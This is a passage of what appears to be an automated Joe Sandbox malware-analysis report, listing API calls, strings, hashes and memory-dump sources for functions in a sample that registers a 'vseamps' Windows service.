                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                                      • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                      • API String ID: 2984211723-3002863673
                                      • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                      • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                      • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                      • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                      • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                      • API String ID: 678758403-4129911376
                                      • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                      • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                      • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                      • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen
                                      • String ID:
                                      • API String ID: 3424473247-0
                                      • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                      • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                      • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                      • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                      • String ID: bad exception$csm$csm$csm
                                      • API String ID: 3766904988-820278400
                                      • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                      • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                      • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                      • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                      • String ID:
                                      • API String ID: 2707001247-0
                                      • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                      • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                      • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                      • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                      • String ID: csm$csm$csm
                                      • API String ID: 849930591-393685449
                                      • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                      • Instruction ID: f190c909e49ca7fecd17968184502092b31e7957061d1eb9ad01b3660a67708a
                                      • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                      • Instruction Fuzzy Hash: ADD1A232B08B4186EB20DF2695443BD77A0FB45BA8F9041B6DE4D57B6ADF38E5A1C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                      • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                      • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                      • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                      • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                      • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                      • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AddressFreeLibraryProc
                                      • String ID: api-ms-$ext-ms-
                                      • API String ID: 3013587201-537541572
                                      • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                      • Instruction ID: b1cdebca0d4c6bf9805e57c294a271188fb2d99da42f4878292d1f1d6901bd19
                                      • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                      • Instruction Fuzzy Hash: D641EF21B19E0251EB168B17A8106BA2391BF45FB0F9945F7DD0E877A8EF3CE4269300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                      • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                      • API String ID: 1119674940-1966266597
                                      • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                      • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                      • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                      • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen$ComputerName
                                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                      • API String ID: 3702919091-996641649
                                      • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                      • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                      • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                      • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                      • String ID:
                                      • API String ID: 3103264659-0
                                      • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                      • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                      • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                      • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                      APIs
                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$Info
                                      • String ID:
                                      • API String ID: 1775632426-0
                                      • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                      • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                      • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                      • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A4C72EB,?,?,?,00007FFE1A4C3EC0,?,?,?,?,00007FFE1A4C3CFD), ref: 00007FFE1A4C71B1
                                      • GetLastError.KERNEL32(?,?,?,00007FFE1A4C72EB,?,?,?,00007FFE1A4C3EC0,?,?,?,?,00007FFE1A4C3CFD), ref: 00007FFE1A4C71BF
                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A4C72EB,?,?,?,00007FFE1A4C3EC0,?,?,?,?,00007FFE1A4C3CFD), ref: 00007FFE1A4C71E9
                                      • FreeLibrary.KERNEL32(?,?,?,00007FFE1A4C72EB,?,?,?,00007FFE1A4C3EC0,?,?,?,?,00007FFE1A4C3CFD), ref: 00007FFE1A4C7257
                                      • GetProcAddress.KERNEL32(?,?,?,00007FFE1A4C72EB,?,?,?,00007FFE1A4C3EC0,?,?,?,?,00007FFE1A4C3CFD), ref: 00007FFE1A4C7263
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                      • String ID: api-ms-
                                      • API String ID: 2559590344-2084034818
                                      • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                      • Instruction ID: ba7f82d7a17f56e5e61b5e0c7315eaaafb50787063e246953340c62ac4f37dfa
                                      • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                      • Instruction Fuzzy Hash: AE31D421B1AE4292EF16DB53A4005796398BF49FB0F9905B6ED1D07768FF3CE4618300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Value$ErrorLast
                                      • String ID:
                                      • API String ID: 2506987500-0
                                      • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                      • Instruction ID: bc3562d6e258100f8ed0ab14dc15090a9c1723719e6599be68fcd5f4a114c96e
                                      • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                      • Instruction Fuzzy Hash: A421B028B0CE4259F755A333555113921419F44FB0F9007FAE97E476FFEE6CB4228200
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                      • String ID: CONOUT$
                                      • API String ID: 3230265001-3130406586
                                      • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                      • Instruction ID: b28350873748554a467716b691259b46a0a5d3e497fe8a48522267c7f72d9d48
                                      • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                      • Instruction Fuzzy Hash: 4D114C31B18E4186E7508B53F84433962A0BBA8FF4F0442B6EA5E87BA4DF7CD5648744
                                      APIs
                                      • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                      • CreateEventW.KERNEL32 ref: 00000001400012C0
                                        • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                        • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                        • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                        • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                        • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                        • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                        • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                        • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                        • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                        • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                        • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                      • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                      • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                        • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                        • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                        • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                        • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                        • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                        • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                      • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                      • String ID: vseamps
                                      • API String ID: 3197017603-3944098904
                                      • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                      • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                      • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                      • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Messagesprintf_s
                                      • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                      • API String ID: 2642950106-3610746849
                                      • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                      • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                      • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
